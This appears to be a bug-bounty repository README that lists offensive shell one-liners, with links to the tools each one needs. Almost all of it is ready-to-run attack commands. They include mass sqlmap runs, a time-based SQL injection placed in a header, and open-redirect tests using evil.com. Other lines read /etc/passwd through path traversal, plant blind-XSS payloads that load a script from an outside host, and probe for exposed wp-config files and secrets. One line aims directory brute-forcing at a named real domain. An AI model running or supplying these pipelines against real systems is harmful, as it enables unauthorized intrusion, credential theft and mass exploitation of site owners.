This Repositories contains list of One Liners with Descriptions and Installation requirements
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- Findomain : https://github.com/Findomain/Findomain
- HTTPX : https://github.com/projectdiscovery/httpx
- Anew : https://github.com/tomnomnom/anew
- Waybackurls : https://github.com/tomnomnom/waybackurls
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- Bhedak : https://github.com/R0X4R/bhedak
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- QS-Replace : https://github.com/tomnomnom/qsreplace
- HTTPX : https://github.com/projectdiscovery/httpx
- Subfinder : https://github.com/projectdiscovery/subfinder
- Httprobe : https://github.com/tomnomnom/httprobe
- Nuclei : https://github.com/projectdiscovery/nuclei
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt
────────────────────────────────────────────────────────────────────────
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- Assetfinder : https://github.com/tomnomnom/assetfinder
- Amass : https://github.com/OWASP/Amass
- Subjack : https://github.com/haccer/subjack
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;
────────────────────────────────────────────────────────────────────────
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'
────────────────────────────────────────────────────────────────────────
- Katana : https://github.com/projectdiscovery/katana
- Dalfox : https://github.com/hahwul/dalfox
- Waybackurls : https://github.com/tomnomnom/waybackurls
- GF : https://github.com/tomnomnom/gf
- Dalfox : https://github.com/hahwul/dalfox
- HTTPX : https://github.com/projectdiscovery/httpx
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"
────────────────────────────────────────────────────────────────────────
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code
────────────────────────────────────────────────────────────────────────
- Gau : https://github.com/lc/gau
- HTTPX : https://github.com/projectdiscovery/httpx
- Nuclei : https://github.com/projectdiscovery/nuclei
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
────────────────────────────────────────────────────────────────────────
- Shodan : https://www.shodan.io
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- HTTPX : https://github.com/projectdiscovery/httpx
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json
────────────────────────────────────────────────────────────────────────
- FFUF : https://github.com/ffuf/ffuf
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>
────────────────────────────────────────────────────────────────────────
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
sudo naabu -list ip_resolver.txt -p 7,20,21,22,23,25,53,69,80,88,102,110,135,137,139,143,381,383,443,464,465,587,593,636,691,902,989,990,993,995,1025,1194,1337,1589,1725,2082,2083,2483,2484,2967,3074,3306,3724,4664,5432,5900,6665,6666,6667,6668,6669,6881,6999,6970,8086,8087,8222,9100,10000,12345,27374,31337 | tee bbcport.txt
masscan -p1-65535 -iL ip_resolver.txt --max-rate 100000 -oG raj.txt
nmap -iL ip_resolver.txt -sV -O -p- -A
cat ip_resolver.txt | httpx | nuclei -t /home/kali/Desktop/nuclei-templates/
cat ip_resolver.txt | httpx --status-code -title | grep "200"
python3 dirsearch.py -e php, asp, aspx.jsp.py, txt, conf, config, bak, backup, swp, old, db, sqlasp, aspx,aspx-,asp-, py,py-, rb, rb, php, php-, bak, bkp, cache, cgi, conf, csv, html, inc, jar, js, json, jsp, jsp-, lock, log, rar, old, sql, sql.gz, sql.zip, sql.tar.gz,sql-, swp, swp-, tar, tar.bz2, tar.gz, txt,wadl, zip -u www.jetking.com --exclude-status 403,401
cat alldomains.txt | httpx | katana -d 5 | tee list.txt | python3 /home/kali/Desktop/tools/xss_vibes/main.py --pipe -t 7